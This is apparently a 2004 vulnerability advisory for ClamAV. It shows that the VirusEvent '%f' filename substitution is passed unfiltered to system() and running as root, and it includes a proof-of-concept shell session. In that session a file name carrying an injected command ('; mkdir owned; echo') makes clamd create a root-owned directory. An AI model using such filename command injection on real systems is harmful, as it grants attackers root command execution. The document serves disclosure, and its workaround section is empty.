date: 30 March 2004
product: clam antivirus
author: l0om - l0om[at]excluded.org - www.excluded.org
#####################################################################
clam antivirus is a antivirus program (which works very well). it comes with a lot
of features and its easy to handle.
for normal you start it from the command line on demand but if you use the the dazuko
module you can also scan in realtime. the program runs
on standard as root but you can drop its privileges if you want to.
in the clamav.conf we can find the "VirusEvent" direction (which is on default disabled):
"Make sure the virus event command cannot be exploited,
eg. by using some special file name when %f is used."
this is not enough. they should del this "%f" feature for security reasons because
in my opinion, for now, you nearly
cant prevent the "%f" thing from breaking out of your VirusEvent and do whatever the
attacker likes too.
#####################################################################
void virusaction(const char *filename, const char *virname, const struct cfgstruct
*copt)
{
[…]
buffer = (char *) mcalloc(strlen(cmd) + strlen(filename) + strlen(virname) + 10,
sizeof(char));
if((pt = strstr(cmd, "%f"))) {
*pt = 0; pt += 2;
strcpy(buffer, cmd); <----
strcat(buffer, filename); <----
if((pt = strstr(cmd, "%f"))) {
*pt = 0; pt += 2;
strcpy(buffer, cmd); <----
strcat(buffer, filename); <----
strcat(buffer, pt); <----
free(cmd);
cmd = strdup(buffer);
}
if((pt = strstr(cmd, "%v"))) {
*pt = 0; pt += 2;
strcpy(buffer, cmd);
strcat(buffer, virname);
strcat(buffer, pt);
free(cmd);
cmd = strdup(buffer);
}
free(buffer);
/* WARNING: this is uninterruptable ! */
system(cmd); <------------------------------------------
free(cmd);
}
#####################################################################
as we can see in the source code there is no filter for shell characters like ";"
or " in the program.
therefor an attacker may take a look at your VirusEvent(as your clamav.conf is world-
readable) and create a file named " ; chmod 777 etc" for example and
put some virus in it. as we can see above the clamd will execute the buffer. The attacker
cant use pathes like "/" but he has what it takes to get root or kill
the system.
the commands will be executed by the clamd on "/" as the process makes a chdir("/").
#####################################################################
example:
l0om:~> ls -l /usr/local/etc/clamav.conf
-rw-r–r-- 1 root root 6863 2004-03-27 11:27 /usr/local/etc/clamav.conf
l0om:~> cat /usr/local/etc/clamav.conf
[…]
VirusEvent /bin/echo "Virus: %f: %v" | /usr/bin/mail -s "VIRUS ALERT" admin network net
#User clamav
[…]
l0om:~> cat >" \"; mkdir owned; echo \""
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
l0om:~> ls
"; mkdir owned; echo " XXX.blow_balls_4_real.mpeg XxX.admin_and_amanda_backup_deamon_having_fun.avi
reading.
l0om:~> ls -ld /owned
drwxrwxrwx 2 root root 48 2004-03-30 11:29 owned
#####################################################################
workaround:
have phun everybody!
someone on NoFX concert or on the deconstruction-tour in kцln? PARTY ON!
– l0om
– www.excluded.org